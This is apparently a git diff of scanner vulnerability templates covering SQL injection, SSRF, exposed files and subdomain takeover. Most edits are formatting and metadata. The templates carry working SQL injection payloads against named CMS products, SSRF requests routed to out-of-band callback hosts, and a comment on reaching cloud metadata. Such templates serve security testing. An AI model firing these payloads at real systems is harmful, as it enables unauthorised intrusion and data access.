--- a/poc/sql_injection/74cms-sqli-8.yaml
+++ b/poc/sql_injection/74cms-sqli-8.yaml
@@ -1,4 +1,5 @@
id: CVE-2020-22210
+
info:
name: 74cms - ajax_officebuilding.php SQL Injection
author: ritikchaddha
@@ -13,16 +14,22 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-22210
cwe-id: CWE-89
+ cpe: cpe:2.3:a:74cms:74cms:*:*:*:*:*:*:*:*
+ epss-score: 0.12933
metadata:
+ max-request: 1
fofa-query: app="74cms"
shodan-query: http.html:"74cms"
tags: cve,cve2020,74cms,sqli
+
variables:
num: "999999999"
-requests:
+
+http:
- method: GET
path:
- '{{BaseURL}}/plus/ajax_officebuilding.php?act=key&key=錦%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5({{num}}),5,6,7,8,9%23'
+
matchers:
- type: word
part: body
diff --git a/poc/sql_injection/Arcms-json_newslist-sqli.yaml b/poc/sql_injection/Arcms-json_newslist-sqli.yaml
old mode 100755
new mode 100644
diff --git a/poc/sql_injection/BlueCMS_v1-adjs-sqli.yaml b/poc/sql_injection/BlueCMS_v1-adjs-sqli.yaml
old mode 100755
new mode 100644
diff --git a/poc/sql_injection/GLPI-9.3.3-SQL-Injection.yaml b/poc/sql_injection/GLPI-9.3.3-SQL-Injection.yaml
index e7c97f72d9..98a2a439f1 100644
--- a/poc/sql_injection/GLPI-9.3.3-SQL-Injection.yaml
+++ b/poc/sql_injection/GLPI-9.3.3-SQL-Injection.yaml
@@ -1,30 +1,25 @@
----
-id: GLPI_SQL_Injection
-
-info:
- author: RedTeamBrasil
- description: "Synacktiv discovered that GLPI exposes a script (/scripts/unlock_tasks.php) that not correctly sanitize usercontrolled data before using it in SQL queries. Thus, an attacker could abuse the affected feature to alter the semantic original SQL query and retrieve database records. This script is reachable without authentication."
- name: "Pre-authenticated SQL injection in GLPI <= 9.3.3"
- reference: "https://www.synacktiv.com/ressources/advisories/GLPI_9.3.3_SQL_Injection.pdf"
- severity: high
- tags: "glpi,cve,sqli"
-
-requests:
- -
- matchers:
- -
- part: body
- type: word
- words:
- - "-MariaDB-"
- max-redirects: 3
- method: GET
- path:
- - "{{BaseURL}}/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1"
- - "{{BaseURL}}/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1"
- redirects: true
- extractors:
- - type: regex
- part: body
- regex:
- - "[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB"
\ No newline at end of file
+id: GLPI_SQL_Injection
+info:
+ author: RedTeamBrasil
+ description: "Synacktiv discovered that GLPI exposes a script (/scripts/unlock_tasks.php) that not correctly sanitize usercontrolled data before using it in SQL queries. Thus, an attacker could abuse the affected feature to alter the semantic original SQL query and retrieve database records. This script is reachable without authentication."
+ name: "Pre-authenticated SQL injection in GLPI <= 9.3.3"
+ reference: "https://www.synacktiv.com/ressources/advisories/GLPI_9.3.3_SQL_Injection.pdf"
+ severity: high
+ tags: "glpi,cve,sqli"
+requests:
+ - matchers:
+ - part: body
+ type: word
+ words:
+ - "-MariaDB-"
+ max-redirects: 3
+ method: GET
+ path:
+ - "{{BaseURL}}/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1"
+ - "{{BaseURL}}/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1"
+ redirects: true
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - "[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB"
diff --git a/poc/sql_injection/Maticsoft-Shop-sqli.yaml b/poc/sql_injection/Maticsoft-Shop-sqli.yaml
index 4a87f191a9..06e83a6789 100644
--- a/poc/sql_injection/Maticsoft-Shop-sqli.yaml
+++ b/poc/sql_injection/Maticsoft-Shop-sqli.yaml
@@ -1,16 +1,13 @@
id: Maticsoft-Shop-sqli
-
info:
name: Maticsoft-Shop商城CategoryId参数SQL注入
author: Str1am
severity: high
tags: Maticsoft,sqli
-
requests:
- method: GET
path:
- "{{BaseURL}}/NodeProdCategory.aspx?action=GetChildNode&CategoryId=2%20AND%201=@@version"
-
matchers-condition: and
matchers:
- type: word
diff --git a/poc/sql_injection/elasticsearch-sql-client-detect.yaml b/poc/sql_injection/elasticsearch-sql-client-detect.yaml
index e075189456..b6efdc2579 100644
--- a/poc/sql_injection/elasticsearch-sql-client-detect.yaml
+++ b/poc/sql_injection/elasticsearch-sql-client-detect.yaml
@@ -1,23 +1,24 @@
-id: elasticsearch-sql-client-detect
-info:
- name: Elasticsearch SQL Client Detect
- author: pussycat0x
- severity: low
- reference: https://www.shodan.io/search?query=http.title%3A%22Elasticsearch-sql+client%22
- tags: elasticsearch,tech,sql
+id: elasticsearch-sql-client-detect
-requests:
- - method: GET
- path:
- - '{{BaseURL}}'
+info:
+ name: Elasticsearch SQL Client Detect
+ author: pussycat0x
+ severity: low
+ reference: https://www.shodan.io/search?query=http.title%3A%22Elasticsearch-sql+client%22
+ tags: elasticsearch,tech,sql
- matchers-condition: and
- matchers:
- - type: word
- words:
- - '<title>Elasticsearch-sql client'
- part: body
-
- - type: status
- status:
- - 200
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Elasticsearch-sql client'
+ part: body
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/sql_injection/exposed-sqlite-manager-7350.yaml b/poc/sql_injection/exposed-sqlite-manager-7350.yaml
index a76ba9d93d..cff80e3ad5 100644
--- a/poc/sql_injection/exposed-sqlite-manager-7350.yaml
+++ b/poc/sql_injection/exposed-sqlite-manager-7350.yaml
@@ -1,18 +1,15 @@
id: exposed-sqlite-manager
-
info:
name: SQLiteManager
author: dhiyaneshDK
severity: medium
reference: https://www.exploit-db.com/ghdb/5003
tags: sqlite
-
requests:
- method: GET
path:
- '{{BaseURL}}/sqlite/'
- '{{BaseURL}}/sqlitemanager/'
-
matchers-condition: and
matchers:
- type: word
diff --git a/poc/sql_injection/sql-dump-10497.yaml b/poc/sql_injection/sql-dump-10497.yaml
index 05e97713ac..0bf0d2bcb0 100644
--- a/poc/sql_injection/sql-dump-10497.yaml
+++ b/poc/sql_injection/sql-dump-10497.yaml
@@ -1,9 +1,11 @@
id: default-sql-dump
+
info:
name: MySQL Dump Files
- author: geeknik & @dwisiswant0
+ author: geeknik,dwisiswant0
severity: medium
- tags: exposure,backup
+ tags: exposure,backup,mysql
+
requests:
- method: GET
path:
@@ -28,6 +30,7 @@ requests:
- "{{BaseURL}}/wp-content/uploads/dump.sql"
headers:
Range: "bytes=0-3000"
+
max-size: 2000 # Size in bytes - Max Size to read from server response
matchers-condition: and
matchers:
@@ -35,6 +38,7 @@ requests:
regex:
- "(?m)(?:DROP|CREATE|(?:UN)?LOCK) TABLE|INSERT INTO"
part: body
+
- type: status
status:
- 200
diff --git a/poc/sql_injection/sqliheader.yaml b/poc/sql_injection/sqliheader.yaml
index 832a9fc156..012bac2af3 100644
--- a/poc/sql_injection/sqliheader.yaml
+++ b/poc/sql_injection/sqliheader.yaml
@@ -1,8 +1,10 @@
id: header-sqli
+
info:
name: Request header based sqli
- author: panch0r3d
+ author: nithissh
severity: high
+
requests:
- method: GET
path:
diff --git a/poc/sql_injection/weiphp-sql-injection.yaml b/poc/sql_injection/weiphp-sql-injection.yaml
index 8b0c9a5a1a..2b57dda7f7 100644
--- a/poc/sql_injection/weiphp-sql-injection.yaml
+++ b/poc/sql_injection/weiphp-sql-injection.yaml
@@ -1,24 +1,28 @@
id: weiphp-sql-injection
+
info:
name: WeiPHP 5.0 SQLI
author: pikpikcu
severity: high
- reference:
- - https://github.com/Y4er/Y4er.com/blob/15f49973707f9d526a059470a074cb6e38a0e1ba/content/post/weiphp-exp-sql.md
- metadata:
- verified: true
- shodan-query: http.html:"WeiPHP5.0"
+ reference: https://github.com/Y4er/Y4er.com/blob/15f49973707f9d526a059470a074cb6e38a0e1ba/content/post/weiphp-exp-sql.md
tags: weiphp,sql
+
requests:
- method: POST
path:
- "{{BaseURL}}/public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--+ "
+ headers:
+ Content-Type: application/x-www-form-urlencoded
+
matchers-condition: and
matchers:
+
- type: word
- part: body
words:
- "52c69e3a57331081823331c4e69d3f2"
+ part: body
+ condition: and
+
- type: status
status:
- 500
diff --git a/poc/sql_injection/wuzhicms-sqli-11658.yaml b/poc/sql_injection/wuzhicms-sqli-11658.yaml
index fbb326fda5..b972d9a3d9 100644
--- a/poc/sql_injection/wuzhicms-sqli-11658.yaml
+++ b/poc/sql_injection/wuzhicms-sqli-11658.yaml
@@ -5,6 +5,7 @@ info:
severity: high
reference: https://github.com/wuzhicms/wuzhicms/issues/184
tags: wuzhicms,sqli
+
requests:
- method: GET
path:
diff --git a/poc/sql_injection/zcms-v3-sqli.yaml b/poc/sql_injection/zcms-v3-sqli.yaml
index a7084a23d3..ed56b88314 100644
--- a/poc/sql_injection/zcms-v3-sqli.yaml
+++ b/poc/sql_injection/zcms-v3-sqli.yaml
@@ -6,18 +6,16 @@ info:
reference:
- https://www.anquanke.com/post/id/183241
tags: zcms,sqli
-variables:
- num: "999999999"
requests:
- method: GET
path:
- - "{{BaseURL}}/admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5({{num}})%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b'"
+ - "{{BaseURL}}/admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5(202072102)%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b'"
matchers-condition: and
matchers:
- - type: word
- words:
- - '{{md5({{num}})}}'
- part: body
- type: status
status:
- 200
+ - type: word
+ words:
+ - "6f7c6dcbc380aac3bcba1f9fccec991e"
+ part: body
diff --git a/poc/ssh/circleci-ssh-config.yaml b/poc/ssh/circleci-ssh-config.yaml
index 3c3d245991..0d19b816b8 100644
--- a/poc/ssh/circleci-ssh-config.yaml
+++ b/poc/ssh/circleci-ssh-config.yaml
@@ -4,7 +4,7 @@ info:
name: circleci ssh-config exposure
author: geeknik
severity: low
- tags: config,exposure
+ tags: config,exposure,circleci
requests:
- method: GET
diff --git a/poc/ssh/ssh-known-hosts.yaml b/poc/ssh/ssh-known-hosts.yaml
index ccdc97175e..100d60c2e3 100644
--- a/poc/ssh/ssh-known-hosts.yaml
+++ b/poc/ssh/ssh-known-hosts.yaml
@@ -1,18 +1,15 @@
id: ssh-known-hosts
-
info:
name: SSH Known Hosts
author: geeknik
reference: https://datacadamia.com/ssh/known_hosts
severity: low
tags: config,exposure,ssh
-
requests:
- method: GET
path:
- "{{BaseURL}}/.ssh/known_hosts"
- "{{BaseURL}}/.ssh/known_hosts.old"
-
matchers-condition: and
matchers:
- type: word
@@ -22,7 +19,6 @@ requests:
- "ssh-rsa"
- "ecdsa-sha2-nistp256"
condition: or
-
- type: status
status:
- 200
diff --git a/poc/ssrf/cloudflare-image-ssrf.yaml b/poc/ssrf/cloudflare-image-ssrf.yaml
index 53750448b2..2674cd7f60 100644
--- a/poc/ssrf/cloudflare-image-ssrf.yaml
+++ b/poc/ssrf/cloudflare-image-ssrf.yaml
@@ -6,17 +6,14 @@ info:
severity: info
description: Cloudflare Image Resizing defaults to restricting resizing to the same domain. This prevents third parties from resizing any image at any origin. However, you can enable this option if you check Resize images from any origin.
reference: https://support.cloudflare.com/hc/en-us/articles/360028146432-Understanding-Cloudflare-Image-Resizing#12345684
- tags: cloudflare,misconfig,oob
+ tags: cloudflare,misconfig,oast
requests:
- raw:
- |
GET /cdn-cgi/image/width/https://{{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
- User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
- Connection: close
Accept: */*
- Accept-Language: en
matchers:
- type: word
diff --git a/poc/ssrf/linkerd-ssrf-detect.yaml b/poc/ssrf/linkerd-ssrf-detect.yaml
index ad99f869a7..16b0eb2d0f 100644
--- a/poc/ssrf/linkerd-ssrf-detect.yaml
+++ b/poc/ssrf/linkerd-ssrf-detect.yaml
@@ -1,5 +1,4 @@
id: linkerd-ssrf-detect
-
# Detect the Linkerd service by overriding the delegation table and
# inspect the response for:
# - a "Via: .. linkerd .."
@@ -14,19 +13,16 @@ id: linkerd-ssrf-detect
#
# - "l5d-dtab: /svc/* => /$/inet/yourserver.com/80", to get to other external hosts
# - "l5d-dtab: /svc/* => /$/inet/169.254.169.254/80", to get to cloud metadata
-
info:
name: Linkerd SSRF detection
author: dudez
severity: info
-
requests:
- method: GET
path:
- "{{BaseURL}}/"
headers:
l5d-dtab: /svc/* => /$/inet/example.com/443
-
matchers-condition: or
matchers:
- type: regex
@@ -34,31 +30,26 @@ requests:
regex:
- '(?mi)^Via\s*?:.*?linkerd.*$'
part: header
-
- type: regex
name: l5d-err-present
regex:
- '(?mi)^l5d-err:.*$'
part: header
-
- type: regex
name: l5d-success-class-present
regex:
- '(?mi)^l5d-success-class: 0.*$'
part: header
-
- type: word
name: ssrf-response-body
words:
- ' This domain is for use in illustrative examples in documents.'
part: body
-
- type: regex
name: resolve-timeout-error-present
regex:
- '(?mi)Exceeded .*? binding timeout while resolving name'
part: body
-
- type: regex
name: dynbind-error-present
regex:
diff --git a/poc/ssrf/microstrategy-ssrf-8861.yaml b/poc/ssrf/microstrategy-ssrf-8861.yaml
index 1af06976e2..4d08720f94 100644
--- a/poc/ssrf/microstrategy-ssrf-8861.yaml
+++ b/poc/ssrf/microstrategy-ssrf-8861.yaml
@@ -4,8 +4,8 @@ info:
author: organiccrap
severity: high
description: Blind server-side request forgery vulnerability on MicroStrategy URL shortener.
- # reference: https://medium.com/@win3zz/how-i-made-31500-by-submitting-a-bug-to-facebook-d31bb046e204
-
+ reference: https://medium.com/@win3zz/how-i-made-31500-by-submitting-a-bug-to-facebook-d31bb046e204
+ tags: microstrategy,ssrf
requests:
- method: GET
path:
diff --git a/poc/ssrf/ssrf-via-oauth-misconfig.yaml b/poc/ssrf/ssrf-via-oauth-misconfig.yaml
index dcf32597cc..9fe1869a10 100644
--- a/poc/ssrf/ssrf-via-oauth-misconfig.yaml
+++ b/poc/ssrf/ssrf-via-oauth-misconfig.yaml
@@ -4,9 +4,8 @@ info:
author: KabirSuda
severity: medium
description: Sends a POST request with the endpoint "/connect/register" to check external Interaction with multiple POST parameters.
- reference:
- - https://portswigger.net/research/hidden-oauth-attack-vectors
tags: misconfig,oast,oauth,ssrf
+ reference: https://portswigger.net/research/hidden-oauth-attack-vectors
requests:
- raw:
- |
diff --git a/poc/ssrf/vmware-vcenter-ssrf.yaml b/poc/ssrf/vmware-vcenter-ssrf.yaml
index 4bd82a9b23..a842c409e1 100644
--- a/poc/ssrf/vmware-vcenter-ssrf.yaml
+++ b/poc/ssrf/vmware-vcenter-ssrf.yaml
@@ -1,24 +1,21 @@
id: vmware-vcenter-ssrf
-
info:
name: VMware vCenter SSRF/LFI/XSS
author: pdteam
severity: critical
- reference: https://github.com/l0ggg/VMware_vCenter
+ reference:
+ - https://github.com/l0ggg/VMware_vCenter
tags: ssrf,lfi,xss,oast,vcenter,vmware
-
requests:
- method: GET
path:
- "{{BaseURL}}/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=https://{{interactsh-url}}"
-
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
-
- type: status
status:
- 200
diff --git a/poc/ssrf/w3c-total-cache-ssrf-11077.yaml b/poc/ssrf/w3c-total-cache-ssrf-11077.yaml
index ce589aee75..e85cc156ae 100644
--- a/poc/ssrf/w3c-total-cache-ssrf-11077.yaml
+++ b/poc/ssrf/w3c-total-cache-ssrf-11077.yaml
@@ -1,13 +1,14 @@
id: w3c-total-cache-ssrf
info:
name: Wordpress W3C Total Cache SSRF <= 0.9.4
- author: random-robbie
+ author: random_robbie
severity: medium
- tags: wordpress,wp-plugin
+ tags: wordpress,wp-plugin,cache,ssrf
description: The W3 Total Cache WordPress plugin was affected by an Unauthenticated Server Side Request Forgery (SSRF) security vulnerability.
- reference: |
+ reference:
- https://wpvulndb.com/vulnerabilities/8644
- https://klikki.fi/adv/w3_total_cache.html
+
requests:
- method: GET
path:
diff --git a/poc/ssrf/w3c-total-cache-ssrf.yaml b/poc/ssrf/w3c-total-cache-ssrf.yaml
index ba650020ae..dcb07f9d0e 100644
--- a/poc/ssrf/w3c-total-cache-ssrf.yaml
+++ b/poc/ssrf/w3c-total-cache-ssrf.yaml
@@ -4,9 +4,11 @@ info:
author: random-robbie
severity: medium
tags: wordpress,wp-plugin
+
# Reference
# https://wpvulndb.com/vulnerabilities/8644
# https://klikki.fi/adv/w3_total_cache.html
+
requests:
- method: GET
path:
@@ -15,4 +17,4 @@ requests:
- type: word
words:
- "NessusFileIncludeTest"
- part: body
+ part: body
\ No newline at end of file
diff --git a/poc/ssrf/xmlrpc-pingback-ssrf-11689.yaml b/poc/ssrf/xmlrpc-pingback-ssrf-11689.yaml
index 4d87c3fbeb..be57a6b501 100644
--- a/poc/ssrf/xmlrpc-pingback-ssrf-11689.yaml
+++ b/poc/ssrf/xmlrpc-pingback-ssrf-11689.yaml
@@ -2,21 +2,16 @@ id: xmlrpc-pingback-ssrf
info:
name: XMLRPC Pingback SSRF
author: geeknik
- reference: https://hackerone.com/reports/406387
severity: high
+ reference:
+ - https://hackerone.com/reports/406387
+ tags: ssrf,generic,xmlrpc
requests:
- raw:
- |
POST /xmlrpc/pingback HTTP/1.1
Host: {{Hostname}}
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
- Accept-Encoding: gzip, deflate
- Cookie: COOKIE_SUPPORT=true; GUEST_LANGUAGE_ID=en_US; ANONYMOUS_USER_ID=2922001
- Connection: close
- Upgrade-Insecure-Requests: 1
- Content-Length: 305
@@ -25,15 +20,10 @@ requests:
http://{{interactsh-url}}
-
- https://{{Hostname}}/web/guest/home/
-
- matchers-condition: and
matchers:
- type: word
- part: interactsh-protocol
+ part: interactsh_protocol
words:
- - "dns"
- "http"
diff --git a/poc/ssrf/zimbra-preauth-ssrf-11810.yaml b/poc/ssrf/zimbra-preauth-ssrf-11810.yaml
index 1fad6022fa..8f955e0f3f 100644
--- a/poc/ssrf/zimbra-preauth-ssrf-11810.yaml
+++ b/poc/ssrf/zimbra-preauth-ssrf-11810.yaml
@@ -1,34 +1,20 @@
id: zimbra-preauth-ssrf
-
info:
- name: Zimbra Collaboration Suite - Server-Side Request Forgery
+ name: Zimbra Collaboration Suite (ZCS) - SSRF
author: gy741
severity: critical
- description: Zimbra Collaboration Suite (ZCS) allows remote unauthenticated attackers to cause the product to include content returned by third-party servers and use it as its own code.
+ description: A vulnerability in Zimbra Collaboration Suite allows remote unauthenticated attackers to cause the product to include content returned by third-party servers and use it as its own code.
reference:
- https://www.adminxe.com/2183.html
- - https://nvd.nist.gov/vuln/detail/CVE-2020-7796
- - https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P7
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.8
- cve-id: CVE-2020-7796
- cwe-id: CWE-918
tags: zimbra,ssrf,oast
- metadata:
- max-request: 1
-
-http:
+requests:
- raw:
- |
GET /service/error/sfdc_preauth.jsp?session=s&userid=1&server=http://{{interactsh-url}}%23.salesforce.com/ HTTP/1.1
Host: {{Hostname}}
Accept: */*
-
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
-
-# Enhanced by mp on 2022/06/03
diff --git a/poc/subdomain_takeover/acquia-takeover-35.yaml b/poc/subdomain_takeover/acquia-takeover-35.yaml
index fa267bacc3..3740c22e91 100644
--- a/poc/subdomain_takeover/acquia-takeover-35.yaml
+++ b/poc/subdomain_takeover/acquia-takeover-35.yaml
@@ -2,7 +2,7 @@ id: acquia-takeover
info:
name: Acquia Takeover Detection
- author: pdcommunity
+ author: pdteam
severity: info
tags: takeover
reference: https://github.com/EdOverflow/can-i-take-over-xyz
diff --git a/poc/subdomain_takeover/aftership-takeover.yaml b/poc/subdomain_takeover/aftership-takeover.yaml
index cda98eeb27..9407e028c7 100644
--- a/poc/subdomain_takeover/aftership-takeover.yaml
+++ b/poc/subdomain_takeover/aftership-takeover.yaml
@@ -3,9 +3,8 @@ info:
name: Aftership Takeover Detection
author: pdteam
severity: high
- reference:
- - https://github.com/EdOverflow/can-i-take-over-xyz
tags: takeover
+ reference: https://github.com/EdOverflow/can-i-take-over-xyz
requests:
- method: GET
path:
diff --git a/poc/subdomain_takeover/agilecrm-takeover-211.yaml b/poc/subdomain_takeover/agilecrm-takeover-211.yaml
index 03cb27aec2..9639c4a23f 100644
--- a/poc/subdomain_takeover/agilecrm-takeover-211.yaml
+++ b/poc/subdomain_takeover/agilecrm-takeover-211.yaml
@@ -1,10 +1,11 @@
id: agilecrm-takeover
info:
name: agilecrm takeover detection
- author: pdcommunity
+ author: pdteam
severity: high
+ reference:
+ - https://github.com/EdOverflow/can-i-take-over-xyz
tags: takeover
- reference: https://github.com/EdOverflow/can-i-take-over-xyz
requests:
- method: GET
path:
diff --git a/poc/subdomain_takeover/aha-takeover-214.yaml b/poc/subdomain_takeover/aha-takeover-214.yaml
index 2cd6bcb83d..649b36b6e5 100644
--- a/poc/subdomain_takeover/aha-takeover-214.yaml
+++ b/poc/subdomain_takeover/aha-takeover-214.yaml
@@ -1,18 +1,15 @@
id: aha-takeover
-
info:
name: Aha Takeover Detection
- author: pdteam
+ author: pdcommunity
severity: high
tags: takeover
reference: https://github.com/EdOverflow/can-i-take-over-xyz
-
requests:
- method: GET
path:
- "{{BaseURL}}"
-
matchers:
- type: word
words:
- - There is no portal here ... sending you back to Aha!
\ No newline at end of file
+ - There is no portal here ... sending you back to Aha!
diff --git a/poc/subdomain_takeover/announcekit-takeover-321.yaml b/poc/subdomain_takeover/announcekit-takeover-321.yaml
index 9326076abe..340dd72666 100644
--- a/poc/subdomain_takeover/announcekit-takeover-321.yaml
+++ b/poc/subdomain_takeover/announcekit-takeover-321.yaml
@@ -1,28 +1,31 @@
-id: announcekit-takeover
-info:
- name: Announcekit Takeover Detection
- author: melbadry9
- severity: high
- tags: takeover,announcekit
- reference:
- - https://blog.melbadry9.xyz/dangling-dns/xyz-services/dangling-dns-announcekit
- - https://github.com/EdOverflow/can-i-take-over-xyz/issues/228
-requests:
- - method: GET
- raw:
- - |2
- GET / HTTP/1.1
-
- Host: {{Hostname}}
-
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
- redirects: true
- max-redirects: 1
- matchers-condition: and
- matchers:
- - type: word
- words:
- - 'Error 404 - AnnounceKit'
- - type: status
- status:
- - 404
+id: announcekit-takeover
+
+info:
+ name: Announcekit Takeover Detection
+ author: melbadry9
+ severity: high
+ tags: takeover,announcekit
+ reference:
+ - https://blog.melbadry9.xyz/dangling-dns/xyz-services/dangling-dns-announcekit
+ - https://github.com/EdOverflow/can-i-take-over-xyz/issues/228
+
+requests:
+ - method: GET
+ raw:
+ - |
+ GET / HTTP/1.1
+ Host: {{Hostname}}
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+
+ redirects: true
+ max-redirects: 1
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Error 404 - AnnounceKit'
+
+ - type: status
+ status:
+ - 404
diff --git a/poc/subdomain_takeover/bitbucket-takeover-740.yaml b/poc/subdomain_takeover/bitbucket-takeover-740.yaml
index f9234ad7a3..2987941c14 100644
--- a/poc/subdomain_takeover/bitbucket-takeover-740.yaml
+++ b/poc/subdomain_takeover/bitbucket-takeover-740.yaml
@@ -1,25 +1,21 @@
id: bitbucket-takeover
-
info:
name: Bitbucket Takeover Detection
author: pdteam
severity: high
tags: takeover
reference: https://github.com/EdOverflow/can-i-take-over-xyz
-
requests:
- method: GET
path:
- "{{BaseURL}}"
-
matchers-condition: and
matchers:
- type: word
words:
- "Repository not found"
part: body
-
- type: word
words:
- "text/plain"
- part: header
\ No newline at end of file
+ part: header
diff --git a/poc/subdomain_takeover/brightcove-takeover.yaml b/poc/subdomain_takeover/brightcove-takeover.yaml
index 31f1fae0cd..3c169edae2 100644
--- a/poc/subdomain_takeover/brightcove-takeover.yaml
+++ b/poc/subdomain_takeover/brightcove-takeover.yaml
@@ -1,10 +1,11 @@
id: brightcove-takeover
info:
name: brightcove takeover detection
- author: pdcommunity
+ author: pdteam
severity: high
+ reference:
+ - https://github.com/EdOverflow/can-i-take-over-xyz
tags: takeover
- reference: https://github.com/EdOverflow/can-i-take-over-xyz
requests:
- method: GET
path:
diff --git a/poc/subdomain_takeover/cargo-takeover-866.yaml b/poc/subdomain_takeover/cargo-takeover-866.yaml
index bd7f124269..f429fe1679 100644
--- a/poc/subdomain_takeover/cargo-takeover-866.yaml
+++ b/poc/subdomain_takeover/cargo-takeover-866.yaml
@@ -1,15 +1,18 @@
id: cargo-takeover
+
info:
name: cargo takeover detection
author: pdteam
severity: high
tags: takeover
reference: https://github.com/EdOverflow/can-i-take-over-xyz
+
requests:
- method: GET
path:
- "{{BaseURL}}"
+
matchers:
- type: word
words:
- - "If you're moving your domain away from Cargo you must make this configuration through your registrar's DNS control panel."
+ - "If you're moving your domain away from Cargo you must make this configuration through your registrar's DNS control panel."
\ No newline at end of file
diff --git a/poc/subdomain_takeover/feedpress-takeover-7458.yaml b/poc/subdomain_takeover/feedpress-takeover-7458.yaml
index f2819bdef7..ddd26565e1 100644
--- a/poc/subdomain_takeover/feedpress-takeover-7458.yaml
+++ b/poc/subdomain_takeover/feedpress-takeover-7458.yaml
@@ -1,11 +1,10 @@
id: feedpress-takeover
info:
name: Agilecrm Takeover Detection
- author: pdteam
+ author: pdcommunity
severity: high
- reference:
- - https://github.com/EdOverflow/can-i-take-over-xyz
tags: takeover
+ reference: https://github.com/EdOverflow/can-i-take-over-xyz
requests:
- method: GET
path:
diff --git a/poc/subdomain_takeover/flywheel-takeover.yaml b/poc/subdomain_takeover/flywheel-takeover.yaml
index 5cd4e2de15..48e5459959 100644
--- a/poc/subdomain_takeover/flywheel-takeover.yaml
+++ b/poc/subdomain_takeover/flywheel-takeover.yaml
@@ -1,10 +1,12 @@
id: flywheel-takeover
+
info:
name: Flywheel Subdomain Takeover
author: smaranchand
severity: high
tags: takeover
reference: https://smaranchand.com.np/2021/06/flywheel-subdomain-takeover
+
requests:
- method: GET
path:
diff --git a/poc/subdomain_takeover/ghost-takeover-7622.yaml b/poc/subdomain_takeover/ghost-takeover-7622.yaml
index 6f529c2709..453169d21f 100644
--- a/poc/subdomain_takeover/ghost-takeover-7622.yaml
+++ b/poc/subdomain_takeover/ghost-takeover-7622.yaml
@@ -1,19 +1,21 @@
id: ghost-takeover
-
info:
name: ghost takeover detection
author: pdteam
severity: high
- tags: takeover
- reference: https://github.com/EdOverflow/can-i-take-over-xyz
-
+ reference:
+ - https://github.com/EdOverflow/can-i-take-over-xyz/issues/89
+ tags: takeover,ghost
requests:
- method: GET
path:
- "{{BaseURL}}"
-
+ matchers-condition: and
matchers:
- type: word
+ part: header
words:
- - The thing you were looking for is no longer here
- - The thing you were looking for is no longer here, or never was
\ No newline at end of file
+ - 'offline.ghost.org'
+ - type: status
+ status:
+ - 302
diff --git a/poc/subdomain_takeover/helpjuice-takeover.yaml b/poc/subdomain_takeover/helpjuice-takeover.yaml
index c5ab27ce89..77a0d626fd 100644
--- a/poc/subdomain_takeover/helpjuice-takeover.yaml
+++ b/poc/subdomain_takeover/helpjuice-takeover.yaml
@@ -1,18 +1,15 @@
id: helpjuice-takeover
-
info:
name: helpjuice takeover detection
author: pdteam
severity: high
tags: takeover
reference: https://github.com/EdOverflow/can-i-take-over-xyz
-
requests:
- method: GET
path:
- "{{BaseURL}}"
-
matchers:
- type: word
words:
- - We could not find what you're looking for.
\ No newline at end of file
+ - We could not find what you're looking for.
diff --git a/poc/subdomain_takeover/helpscout-takeover-7934.yaml b/poc/subdomain_takeover/helpscout-takeover-7934.yaml
index 899cf00fe0..548f39f325 100644
--- a/poc/subdomain_takeover/helpscout-takeover-7934.yaml
+++ b/poc/subdomain_takeover/helpscout-takeover-7934.yaml
@@ -1,16 +1,19 @@
id: helpscout-takeover
+
info:
name: helpscout takeover detection
author: pdteam
severity: high
- reference:
- - https://github.com/EdOverflow/can-i-take-over-xyz
tags: takeover
+ reference: https://github.com/EdOverflow/can-i-take-over-xyz
+
requests:
- method: GET
path:
- "{{BaseURL}}"
+
matchers:
+
- type: word
words:
- - "No settings were found for this company:"
+ - "No settings were found for this company:"
\ No newline at end of file
diff --git a/poc/subdomain_takeover/jazzhr-takeover-8235.yaml b/poc/subdomain_takeover/jazzhr-takeover-8235.yaml
index d8f20df0d2..cc2e8d6a32 100644
--- a/poc/subdomain_takeover/jazzhr-takeover-8235.yaml
